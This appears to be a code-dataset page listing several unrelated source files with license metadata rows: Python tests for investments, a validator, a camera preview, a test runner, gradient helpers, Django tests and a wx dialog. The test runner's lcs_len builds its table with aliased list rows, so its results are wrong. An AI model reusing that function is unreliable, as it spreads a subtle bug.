self.assertActionsEqual(inv, u"""
type: cancel
user: {user}
timestamp: '{timestamp}'
""".format(
user=self.user,
timestamp=self.timestamp,
))
def test_cancel_paid(self):
inv = self.setupInvestment(
nominal_amount = 200.0,
purchase_date = isodate('2001-01-02'),
active = True,
)
with self.assertRaises(StateError) as ctx:
inv.cancel()
self.assertExceptionMessage(ctx.exception,
"Only unpaid investments can be cancelled")
def test_cancel_inactive(self):
inv = self.setupInvestment(
active = False,
)
with self.assertRaises(StateError) as ctx:
inv.cancel()
self.assertExceptionMessage(ctx.exception,
"Inactive investments can not be cancelled")
def test_cancel_invoiced(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = False,
active = True,
)
inv.cancel()
self.assertChangesEqual(inv, """
active: False
purchase_date: null
first_effective_date: null
last_effective_date: null
paid_amount: 0
""",
u'CANCEL: La inversió ha estat cancel·lada\n'
)
self.assertActionsEqual(inv, u"""
type: cancel
user: {user}
timestamp: '{timestamp}'
""".format(
user=self.user,
timestamp=self.timestamp,
))
# TODO: amortize should check
def test_amortize_noPreviousAmortization(self):
inv = self.setupInvestment(
purchase_date=isodate('2016-01-01'),
amortized_amount = 0.,
)
inv.amortize(
date = isodate('2018-01-01'),
to_be_amortized=40.,
)
self.assertChangesEqual(inv, """\
amortized_amount: 40.0
""",
u"AMORTIZATION: Generada amortització de 40.00 € pel 2018-01-01\n"
)
self.assertActionsEqual(inv, u"""
type: amortize
user: {user}
timestamp: '{timestamp}'
amount: 40.0
date: 2018-01-01
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_amortize_withPreviousAmortization(self):
inv = self.setupInvestment(
purchase_date = isodate('2018-01-01'),
amortized_amount = 40.,
)
inv.amortize(
date = isodate('2018-01-01'),
to_be_amortized=40.,
)
self.assertChangesEqual(inv, """\
amortized_amount: 80.0
""",
u"AMORTIZATION: Generada amortització de 40.00 € pel 2018-01-01\n"
)
def test_amortize_unpaid(self):
inv = self.setupInvestment(
purchase_date=False,
amortized_amount = 1000.0,
)
with self.assertRaises(StateError) as ctx:
inv.amortize(
date=isodate('2018-01-01'),
to_be_amortized=40.0,
)
self.assertExceptionMessage(ctx.exception,
u"Amortizing an unpaid investment")
def test_migrate(self):
inv = self.setupInvestment(
name = "GENKWH0001",
)
inv.migrate(
oldVersion = "1.0",
newVersion = "2.0",
)
self.assertChangesEqual(inv, """\
{}
""",
u"MIGRATED: "
u"Migració de la versió 1.0 a 2.0\n"
)
self.assertActionsEqual(inv,"""
type: migrate
user: {user}
timestamp: '{timestamp}'
oldversion: '1.0'
newversion: '2.0'
""".format(
user = self.user,
timestamp = self.timestamp,
))
# vim: ts=4 sw=4 et
| agpl-3.0 | 1,281,826,282,411,932,400 | 30.007742 | 163 | 0.492364 | false |
jamiepg1/minos | minos/validators/inclusion_validator.py | 1 | 1362 | from __future__ import absolute_import
from minos.errors import ValidationError
from minos.validator import Validator
class InclusionValidator(Validator):
"""
Validate whether a field's value is in a list of accepted values.
"""
def _validate(self, instance, field, **kwargs):
"""Validate whether a field's value is in a list of accepted values.
:param object instance: Python object to be validated.
:param string field: Name of field in *instance* to be validate.
:param dict kwargs: Keyword arguments. See :ref:`keyword-args` for more info.
Additionally, the following kwargs are required:
- **in\_:** A list of acceptable values for *field*.
:rtype: None
:raises: :class:`~errors.ValidationError` if *field* is not an email address.
:raises: UserWarning if *in\_* is not supplied.
"""
value = getattr(instance, field)
if not value:
return
if not kwargs.get('in_'):
raise UserWarning("Must provide 'in_' keyword argument for inclusion validator")
pass
try:
valid_values = kwargs.get('in_')
assert value in valid_values
except AssertionError:
msg = '%s %s' % (field, 'is not valid.')
raise ValidationError(field, None, msg)
| mit | -3,107,472,991,654,700,000 | 34.842105 | 92 | 0.618943 | false |
ch1bo/ambicam | preview.py | 1 | 3567 | # Interactive preview module, run with python -i
import cv2
import numpy as np
import picamera
import picamera.array
import sys
import multiprocessing as mp
RESOLUTION = (640,480)
FRAMERATE = 5
OFFSET = 10
M = np.load('M.npy')
width, height = np.load('res.npy')
def compute_map(M_inv, x, y, width, height):
coords = []
for j in range(int(y), int(y+height)):
for i in range(int(x), int(x+width)):
coords.append([i, j, 1])
return np.dot(M_inv, np.array(coords).T).astype('float32')
class HyperionOutput(picamera.array.PiRGBAnalysis):
def __init__(self, camera, M, width, height, offset=10):
super(HyperionOutput, self).__init__(camera)
self.finished = mp.Event()
self.M_inv = np.linalg.inv(M)
self.width = int(width)
self.height = int(height)
self.offset = offset
# Calculate source image maps
self.top_map = compute_map(self.M_inv, 0, 0, width, offset)
self.left_map = compute_map(self.M_inv, 0, offset, offset, height-2*offset)
self.right_map = compute_map(self.M_inv, width-offset, offset, offset, height-2*offset)
self.bottom_map = compute_map(self.M_inv, 0, height-offset, width, offset)
# TODO cv2.convertMaps to make them fix-point -> faster?
def analyze(self, img):
# warped = cv2.warpPerspective(img, M, (width,10))
# Warp image map-by-map
top = cv2.remap(img, self.top_map[0], self.top_map[1],
cv2.INTER_LINEAR).reshape(self.offset,self.width,3)
left = cv2.remap(img, self.left_map[0], self.left_map[1],
cv2.INTER_LINEAR).reshape(self.height-2*self.offset,self.offset,3)
right = cv2.remap(img, self.right_map[0], self.right_map[1],
cv2.INTER_LINEAR).reshape(self.height-2*self.offset,self.offset,3)
bottom = cv2.remap(img, self.bottom_map[0], self.bottom_map[1],
cv2.INTER_LINEAR).reshape(self.offset,self.width,3)
# Stitch and preview
cv2.imshow('original', img)
warped = np.zeros((self.height, self.width, 3), dtype='uint8')
warped[:self.offset,:] += top
warped[self.offset:-self.offset,:self.offset] += left
warped[self.offset:-self.offset,self.width-self.offset:] += right
warped[self.height-self.offset:,:] += bottom
cv2.imshow('warped', warped)
if cv2.waitKey(100) & 0xFF == ord("q"):
self.finished.set()
def settings(camera):
print('analog_gain: ', camera.analog_gain)
print('awb_mode: ', camera.awb_mode)
print('awb_gains: ', camera.awb_gains)
print('brightness: ', camera.brightness)
print('contrast: ', camera.contrast)
print('digital_gain: ', camera.digital_gain)
print('exposure_mode: ', camera.exposure_mode)
print('exposure_speed: ', camera.exposure_speed)
print('iso: ', camera.iso)
print('saturation: ', camera.saturation)
print('sensor_mode: ', camera.sensor_mode)
print('sharpness: ', camera.sharpness)
print('shutter_speed: ', camera.shutter_speed)
print('video_denoise: ', camera.video_denoise)
print('video_stabilization: ', camera.video_stabilization)
print('zoom: ', camera.zoom)
with picamera.PiCamera(resolution=RESOLUTION, framerate=FRAMERATE) as camera:
settings(camera)
with HyperionOutput(camera, M, width, height, offset=OFFSET) as output:
camera.start_recording(output, 'bgr')
while not output.finished.wait(100):
pass
camera.stop_recording()
| mpl-2.0 | -1,066,425,132,792,566,400 | 41.464286 | 95 | 0.630782 | false |
yuri-kilochek/graphematizer | tests/run.py | 1 | 5005 | import os
import os.path
import subprocess
import argparse
import collections
import itertools
import time
import sys
GRAPHEMATIZER_PATH = os.path.normpath('../graphematizer')
TERMINAL_WIDTH = 80
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('test_set', help='Test set to run.')
arg_parser.add_argument('-c', '--concurrency', type=int, default=(os.cpu_count() or 4)**3,
help='Max amount of tests to run concurrently.'
' Defaults to CPU count cubed or 16 if is is unavailable.')
arg_parser.add_argument('-t', '--score_threshold', type=float, default=0.0,
help='If a test scores below this value it will be shown. Default to 0.0, showing no tests.')
args = arg_parser.parse_args()
def lcs_len(a, b):
m = len(a)
n = len(b)
c = [[0] * (n + 1)] * (m + 1)
for i in range(1, m + 1):
for j in range(1, n + 1):
if a[i - 1] == b[j - 1]:
c[i][j] = c[i - 1][j - 1] + 1
else:
c[i][j] = max(c[i][j - 1], c[i - 1][j])
return c[m][n]
def load_graphemes(graphemes_pathname):
with open(graphemes_pathname, 'r', encoding='utf-8') as file:
return [g.rstrip() for g in file.readlines()]
class Tester:
def __init__(self, test_id):
self._test_id = test_id
plaintext_path = os.path.join(args.test_set, 'tests', os.path.join(*test_id), 'plaintext.txt')
self._true_graphemes_path = os.path.join(args.test_set, 'tests', os.path.join(*test_id), 'graphemes.txt')
self._test_graphemes_path = '~{}-{}-graphemes.txt'.format(args.test_set, '-'.join(test_id))
self._process = subprocess.Popen([GRAPHEMATIZER_PATH,
os.path.relpath(plaintext_path, GRAPHEMATIZER_PATH),
os.path.relpath(self._test_graphemes_path, GRAPHEMATIZER_PATH)])
self._result = None
@property
def result(self):
if self._result is None:
self._process.poll()
if self._process.returncode is None:
return None
if self._process.returncode != 0:
raise Exception('Test {} is bad.'.format('/'.join(self._test_id)))
true_graphemes = load_graphemes(self._true_graphemes_path)
test_graphemes = load_graphemes(self._test_graphemes_path)
os.remove(self._test_graphemes_path)
total = len(true_graphemes)
match = lcs_len([g[2:] for g in true_graphemes], [g[2:] for g in test_graphemes])
match_marked = lcs_len(true_graphemes, test_graphemes)
self._result = self._test_id, total, match, match_marked
return self._result
def enumerate_tests():
def enumerate_tests(path, test_id):
for _, dirs, files in os.walk(path):
if 'plaintext.txt' in files:
yield test_id
else:
for dir in dirs:
yield from enumerate_tests(os.path.join(path, dir), test_id + [dir])
break
yield from enumerate_tests(os.path.join(args.test_set, 'tests'), [])
def do_tests():
testers = collections.deque()
test_ids = iter(enumerate_tests())
while True:
while testers and testers[0].result is not None:
yield testers.popleft().result
active_count = 0
for tester in testers:
if tester.result is None:
active_count += 1
if active_count < args.concurrency:
next_id = next(test_ids, None)
if next_id is None:
break
testers.append(Tester(next_id))
else:
time.sleep(sys.float_info.epsilon)
while testers:
if testers[0].result is not None:
yield testers.popleft().result
else:
time.sleep(sys.float_info.epsilon)
def compute_scores(total, match, match_marked):
if total > 0:
return match / total, match_marked / total
else:
return 1.0, 1.0
total = 0
match = 0
match_marked = 0
print('bad tests (with score below {}):'.format(args.score_threshold))
print(' {:>14} | {:>14} | {}'.format('score', 'score marked', 'id'))
for i, (i_id, i_total, i_match, i_match_marked) in enumerate(do_tests()):
i_score, i_score_marked = compute_scores(i_total, i_match, i_match_marked)
if i_score < args.score_threshold or i_score_marked < args.score_threshold:
text = '{:>14.3f}% | {:>14.3f}% | {}'.format(i_score * 100, i_score_marked * 100, '/'.join(i_id))
print(text, end=' ' * (TERMINAL_WIDTH - 1 - len(text)) + '\n')
total += i_total
match += i_match; match_marked += i_match_marked
score, score_marked = compute_scores(total, match, match_marked)
text = '{:>14.3f}% | {:>14.3f}% | <total over {} tests>'.format(score * 100, score_marked * 100, i)
print(text, end=' ' * (TERMINAL_WIDTH - 1 - len(text)) + '\r')
print()
print('Done.')
| gpl-3.0 | -6,139,452,096,908,997,000 | 32.817568 | 117 | 0.57003 | false |
ceos-seo/data_cube_utilities | data_cube_utilities/transect/interpolate.py | 1 | 1702 | import numpy as np
from itertools import islice
nan = np.nan
def window(seq, n=2):
"Returns a sliding window (of width n) over data from the iterable"
" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... "
it = iter(seq)
result = tuple(islice(it, n))
if len(result) == n:
yield result
for elem in it:
result = result[1:] + (elem,)
yield result
def hex_to_rgb(rgbstr):
rgbstr= rgbstr.replace('#','')
hex_prefix = '0x'
r = hex_prefix + rgbstr[:2]
g = hex_prefix + rgbstr[2:4]
b = hex_prefix + rgbstr[4:]
return np.array([int(r, 16),
int(g, 16),
int(b, 16)])
def _bin_and_index(value, size):
'''Takes two arguments. value and size. value is a float between 0 and 1, size is the number of bins into which
we divide the range 0 and 1. An index is returned denoting which of these bins value falls into
'''
for i in range(size):
if value > i/size and value <= (i + 1)/size:
return i
return 0
def get_gradient(colors, value):
''' make sure the value is between 0 and 1. If the value is between 0 and 1, you will get interpolated values in between.
This displays gradients with quadruple digit precision
'''
if np.isnan(value):
return np.array([nan,nan,nan])
colors = [np.array(hex_to_rgb(color)) for color in colors]
color_pairs = list(window(colors))
size = len(color_pairs)
index = _bin_and_index(value,size)
color1,color2 = color_pairs[index]
direction = (color2 - color1).astype(float)
v = value * size - index
return (v * direction) + color1
| apache-2.0 | -6,673,177,766,192,212,000 | 28.859649 | 125 | 0.583431 | false |
prabhugs/mynote | mynote/notes/tests.py | 1 | 1217 | from django.test import TestCase
import datetime
from django.utils import timezone
from notes.models import Post
# Create your tests here.
class PostMethodTests(TestCase):
def test_waspublishedrecently_with_future_post(self):
"""
:return: False for post whose published_date is in the future
"""
time = timezone.datetime.now() + datetime.timedelta(days=30)
future_post = Post(published_date = time)
self.assertEqual(future_post.waspublishedrecently(), False)
def test_waspublishedrecently_with_old_post(self):
"""
:return: False for post whose published_date is greater than 24hrs from now
"""
time = timezone.datetime.now() - datetime.timedelta(days=30)
future_post = Post(published_date = time)
self.assertEqual(future_post.waspublishedrecently(), False)
def test_waspublishedrecently_with_recent_post(self):
"""
:return: True for post whose published_date is not less than 24hrs from now
"""
time = timezone.datetime.now() - datetime.timedelta(hours=1)
future_post = Post(published_date = time)
self.assertEqual(future_post.waspublishedrecently(), True) | mit | -825,587,557,338,921,200 | 37.0625 | 83 | 0.677896 | false |
mikan/racm | src/racm_ui_edit_dialog.py | 1 | 1597 | """Subclass of EditDialog, which is generated by wxFormBuilder."""
import wx
import racm_ui
# Implementing EditDialog
class EditDialog(racm_ui.EditDialog):
_main_frame = None
_row = -1
def __init__(self, parent, main_frame, host, port, name, row):
racm_ui.EditDialog.__init__(self, parent)
self._main_frame = main_frame
self.port_text.SetValue(str(port))
self.host_text.SetValue(host)
self.port_text.SetValue(port)
self.name_text.SetValue(name)
self._row = row
def show_dialog(self, message):
dialog = wx.MessageDialog(None, message, self.GetTitle(), wx.OK | wx.ICON_WARNING)
dialog.ShowModal()
dialog.Destroy()
def show_missing_error(self, value_type):
self.show_dialog("Please input the " + value_type + ".")
def show_illegal_error(self, value_type, character):
self.show_dialog("Illegal character \"" + character + "\" contained in " + value_type + ".")
# Handlers for EditDialog events.
def on_ok_clicked(self, event):
if self.host_text.IsEmpty():
self.show_missing_error("host")
return
if ":" in self.host_text.Value:
self.show_illegal_error("host", ":")
return
if self.port_text.IsEmpty():
self.show_missing_error("port")
return
host = self.host_text.Value + ":" + self.port_text.Value
self._main_frame.edit_item(host, self.name_text.Value, "", self._row)
self.Destroy()
def on_cancel_clicked(self, event):
self.Destroy()
| bsd-3-clause | -3,549,579,078,472,662,500 | 32.270833 | 100 | 0.603632 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.